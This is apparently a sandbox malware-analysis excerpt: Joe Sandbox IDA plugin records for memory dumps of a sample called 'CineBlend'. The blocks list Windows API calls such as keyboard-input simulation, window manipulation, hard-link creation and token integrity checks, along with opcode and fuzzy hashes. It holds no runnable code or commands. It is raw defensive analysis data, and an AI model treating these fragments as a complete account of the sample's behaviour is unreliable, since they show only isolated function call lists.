                                          • Opcode Fuzzy Hash: 7c46fa074ca2637b91e6d119ddc3d68dbc732ea8709d137ab7882f3f6986a739
                                          • Instruction Fuzzy Hash: E741A174A40200AFE720AF24C896F2A77E5EB54754F54C4DCF9558F2D2D772ED428B90
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00BD6D1A
                                          • ScreenToClient.USER32(?,?), ref: 00BD6D4D
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00BD6DBA
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: c8547d81e549d42b766ea6dcc5f537a55d24218dabe90c23fc1264a9cfae3465
                                          • Instruction ID: 2c016a10254c5cf00f0d1af79b06fbec673bea26b33659a37ae1f220b3ff806f
                                          • Opcode Fuzzy Hash: c8547d81e549d42b766ea6dcc5f537a55d24218dabe90c23fc1264a9cfae3465
                                          • Instruction Fuzzy Hash: A651FE74A01209EFCF14DF68D880AAEBBF6FB55360F1085AAF95597390E730AD51CB50
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 437827aba2a23e698a8dc882e8e52afb2f42e682f204b469919c7fc0a1eae880
                                          • Instruction ID: 66ba87f01e677a9c80665de99f62d7cd051c3007ec13002d8dd628f73bb2dbcb
                                          • Opcode Fuzzy Hash: 437827aba2a23e698a8dc882e8e52afb2f42e682f204b469919c7fc0a1eae880
                                          • Instruction Fuzzy Hash: 9541DB72A00704AFD725AF78CC41F6ABBEDEB84710F10C5AEF165DB291D77199018B91
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BB61C8
                                          • GetLastError.KERNEL32(?,00000000), ref: 00BB61EE
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BB6213
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BB623F
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: 538fd83171dee74fa24a92aaf0e6e938d67455975a013ee6b27f18f375312cba
                                          • Instruction ID: e25f4252aed9593d75dc05c0849c2973677a69d21070a18db5629a1e3fd101b8
                                          • Opcode Fuzzy Hash: 538fd83171dee74fa24a92aaf0e6e938d67455975a013ee6b27f18f375312cba
                                          • Instruction Fuzzy Hash: DD413A39600610DFCB11EF15C585A6EBBE2FF89710B1984C8E85AAB362CB74FD01DB91
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00B670E1,00000000,00000000,00B68649,?,00B68649,?,00000001,00B670E1,8BE85006,00000001,00B68649,00B68649), ref: 00B7DC90
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B7DD19
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B7DD2B
                                          • __freea.LIBCMT ref: 00B7DD34
                                            • Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          • Opcode ID: c10a865f23497597deb3eb2889c1403fd95763aa148b080970f7963088582483
                                          • Instruction ID: 7567bd4ccbe3843b293855188e42e1051b7b9b1f1476e51e5015d235968c69db
                                          • Opcode Fuzzy Hash: c10a865f23497597deb3eb2889c1403fd95763aa148b080970f7963088582483
                                          • Instruction Fuzzy Hash: 3031DE32A0020AABDF259F64CC85EAE7BF5EF40750B0481A8FC29D7250EB35CD50CBA0
                                          APIs
                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00BAB473
                                          • SetKeyboardState.USER32(00000080), ref: 00BAB48F
                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00BAB4FD
                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00BAB54F
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: ad7f811301f432ce9c488d68adab4340446d3c5538b4caf5894a8eeedda4b12b
                                          • Instruction ID: 046c8cc686a79b444e1b198dd3821f18a38ce5588829d7de3343a4607ffa4520
                                          • Opcode Fuzzy Hash: ad7f811301f432ce9c488d68adab4340446d3c5538b4caf5894a8eeedda4b12b
                                          • Instruction Fuzzy Hash: 10315B70E482086EFF308B249855FFE7BF5EF5B310F04429AE4A5562D3CB7589458761
                                          APIs
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00BD5DF0
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD5E13
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD5E20
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BD5E46
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LongWindow$InvalidateMessageRectSend
                                          • String ID:
                                          • API String ID: 3340791633-0
                                          • Opcode ID: d91c908550e8d9f93858f412479ef07fcfb400ec7fb14aee35b0bcd3f0455375
                                          • Instruction ID: 823b729b7b727773c0d7b8ef3444b260c3972c8a3661d17648e8eba181d0b60c
                                          • Opcode Fuzzy Hash: d91c908550e8d9f93858f412479ef07fcfb400ec7fb14aee35b0bcd3f0455375
                                          • Instruction Fuzzy Hash: 2231C438A52A08AFEB34AF14CC49FE8B7E6EB05350F584197F611973E1E730AA80D751
                                          APIs
                                          • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00BAB5B8
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BAB5D4
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00BAB63B
                                          • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00BAB68D
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 1b4521d7cfc145fd4aa46b1d34bebd58f109b081bf7a85e987421fa69475057a
                                          • Instruction ID: 96531a4d5d22f765501106e01a295fd2dfdf7351ba057d31c1857694f363e423
                                          • Opcode Fuzzy Hash: 1b4521d7cfc145fd4aa46b1d34bebd58f109b081bf7a85e987421fa69475057a
                                          • Instruction Fuzzy Hash: 1D312A309486086EFF248B688815FFAFBE6FB96310F0442AAE4A1521D2D77489458BA1
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00BD80D4
                                          • GetWindowRect.USER32(?,?), ref: 00BD814A
                                          • PtInRect.USER32(?,?,?), ref: 00BD815A
                                          • MessageBeep.USER32(00000000), ref: 00BD81C6
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: b4cb8eccf9565ef9598777210112c6b696141d37fd497ea05719faa81c0c6755
                                          • Instruction ID: 9a0db1a7608b0c0fa3d88e1dc9953f21073374a85faa5d9f2a88e286d6bf9df0
                                          • Opcode Fuzzy Hash: b4cb8eccf9565ef9598777210112c6b696141d37fd497ea05719faa81c0c6755
                                          • Instruction Fuzzy Hash: 55418B34A01215DFCB11DF58C880BA9F7F5FB4D315F1480AAE954AB361EB30A84ACB80
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00BD2187
                                            • Part of subcall function 00BA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA43AD
                                            • Part of subcall function 00BA4393: GetCurrentThreadId.KERNEL32 ref: 00BA43B4
                                            • Part of subcall function 00BA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BA2F00), ref: 00BA43BB
                                          • GetCaretPos.USER32(?), ref: 00BD219B
                                          • ClientToScreen.USER32(00000000,?), ref: 00BD21E8
                                          • GetForegroundWindow.USER32 ref: 00BD21EE
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 20b23b3a59fde7c7e09a42a3c3c838735341c4c83bcfdecc4155a3242a13fc80
                                          • Instruction ID: d4ae7aaa37e5d950a52fbe58219a947c055599c1060373046213089c6d5fa522
                                          • Opcode Fuzzy Hash: 20b23b3a59fde7c7e09a42a3c3c838735341c4c83bcfdecc4155a3242a13fc80
                                          • Instruction Fuzzy Hash: 40313071D01109AFCB04EFA9C8818AEB7FCEF58304B5084AAE455E7311EB71DE45CBA0
                                          APIs
                                            • Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF
                                          • _wcslen.LIBCMT ref: 00BAE8E2
                                          • _wcslen.LIBCMT ref: 00BAE8F9
                                          • _wcslen.LIBCMT ref: 00BAE924
                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00BAE92F
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$ExtentPoint32Text
                                          • String ID:
                                          • API String ID: 3763101759-0
                                          • Opcode ID: 2da8c310f87f2535dea953496c8e08049616be7963e426bc90e0b3500a4e9d88
                                          • Instruction ID: b107e1c739554e22a61133a57fd97b175194aced0f217800eaf7d51f9bf7b998
                                          • Opcode Fuzzy Hash: 2da8c310f87f2535dea953496c8e08049616be7963e426bc90e0b3500a4e9d88
                                          • Instruction Fuzzy Hash: 8921A171D01219AFCB10AFA8D982BAEB7F8EF46350F1440A5E914BB241D774DE41CBA1
                                          APIs
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                          • GetCursorPos.USER32(?), ref: 00BD9A5D
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BD9A72
                                          • GetCursorPos.USER32(?), ref: 00BD9ABA
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00BD9AF0
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 057bd7c275cd35b060bba3def8e14a6c28fb31450426e5c008d01867b9b8386d
                                          • Instruction ID: 0e0d293c5534390b992c2ac070b44e38437afdb6e8d426a4d7cad7e76a33252f
                                          • Opcode Fuzzy Hash: 057bd7c275cd35b060bba3def8e14a6c28fb31450426e5c008d01867b9b8386d
                                          • Instruction Fuzzy Hash: 7A21D336601018EFCF159F58C898EFEBBF5FB0A710F404196F9098B261E7309950EB50
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00BDDC30), ref: 00BADBA6
                                          • GetLastError.KERNEL32 ref: 00BADBB5
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BADBC4
                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BDDC30), ref: 00BADC21
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 2267087916-0
                                          • Opcode ID: 8d8ec9aae90df53fc1720da551455f83fd322624660611417b9b286e9ed3f22f
                                          • Instruction ID: df2955a3386ce6be3d59d18649f00b1c575093c25480dac4d30a08ae692271dd
                                          • Opcode Fuzzy Hash: 8d8ec9aae90df53fc1720da551455f83fd322624660611417b9b286e9ed3f22f
                                          • Instruction Fuzzy Hash: B021A67054D6019F8310DF28C88496BB7E8EF56364F504A99F4DAC32A1EB30D946DB52
                                          APIs
                                            • Part of subcall function 00BA1960: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA1976
                                            • Part of subcall function 00BA1960: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1982
                                            • Part of subcall function 00BA1960: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1991
                                            • Part of subcall function 00BA1960: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1998
                                            • Part of subcall function 00BA1960: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA19AE
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BA1F0A
                                          • _memcmp.LIBVCRUNTIME ref: 00BA1F2D
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA1F63
                                          • HeapFree.KERNEL32(00000000), ref: 00BA1F6A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: 7fe65c6439fdceda2c16b7378e6c7506efdcb6ee35600ffc4ddc0059a1a20abc
                                          • Instruction ID: 4fdadbdd68608dc35fa7329f1103ac32d4b711a0fbe4373ec2b6389e8f1ab002
                                          • Opcode Fuzzy Hash: 7fe65c6439fdceda2c16b7378e6c7506efdcb6ee35600ffc4ddc0059a1a20abc
                                          • Instruction Fuzzy Hash: F121B071E05109EFDB00DFA8C955BEEB7F8EF45355F044499E455AB240E731AE05CBA0
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00BD32A6
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BD32C0
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BD32CE
                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BD32DC
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: c10d9bf441a739b7a3bc3a8d53d3286a867ea547b089e39d43a795df36772379
                                          • Instruction ID: c4399de5d11b0428dd4d063e776b38697ab1d88df63f8c19b8ebfe5f0c3bf658
                                          • Opcode Fuzzy Hash: c10d9bf441a739b7a3bc3a8d53d3286a867ea547b089e39d43a795df36772379
                                          • Instruction Fuzzy Hash: 4921E031605111AFD7049B24C855F6AFBE5EF81724F28829AF8268B3D2DB71EE41CBD1
                                          APIs
                                            • Part of subcall function 00BA96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00BA8271,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?), ref: 00BA96F3
                                            • Part of subcall function 00BA96E4: lstrcpyW.KERNEL32(00000000,?,?,00BA8271,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA9719
                                            • Part of subcall function 00BA96E4: lstrcmpiW.KERNEL32(00000000,?,00BA8271,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?), ref: 00BA974A
                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA828A
                                          • lstrcpyW.KERNEL32(00000000,?,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA82B0
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA82EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: b9d75fb83fe7b8f1cf2922a940a376b2d8c7296a8bd7e078e2da1ce89983f50a
                                          • Instruction ID: 52517f5d4154e40b4e6a07152247d502905abdf4b110348b3c298d1ed8d91aba
                                          • Opcode Fuzzy Hash: b9d75fb83fe7b8f1cf2922a940a376b2d8c7296a8bd7e078e2da1ce89983f50a
                                          • Instruction Fuzzy Hash: DC11087A204342AFCF15AF38D845E7A77E9FF46750B50416AF942C7290EF319811D794
                                          APIs
                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00BD615A
                                          • _wcslen.LIBCMT ref: 00BD616C
                                          • _wcslen.LIBCMT ref: 00BD6177
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD62B5
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend_wcslen
                                          • String ID:
                                          • API String ID: 455545452-0
                                          • Opcode ID: b25abefe79cb678eae7dc5e26dcd46f4b9a924ce4533732ef7855bc6826a9235
                                          • Instruction ID: 7867eac9e2ea1bae8071711b4154a055b68610981007767c4ac58e5db097203d
                                          • Opcode Fuzzy Hash: b25abefe79cb678eae7dc5e26dcd46f4b9a924ce4533732ef7855bc6826a9235
                                          • Instruction Fuzzy Hash: 3C119375500618A6EB20DFA88CC4AEFB7FCEB15364F1041ABF915E6282FB74C944CB60
                                          Memory Dump Source
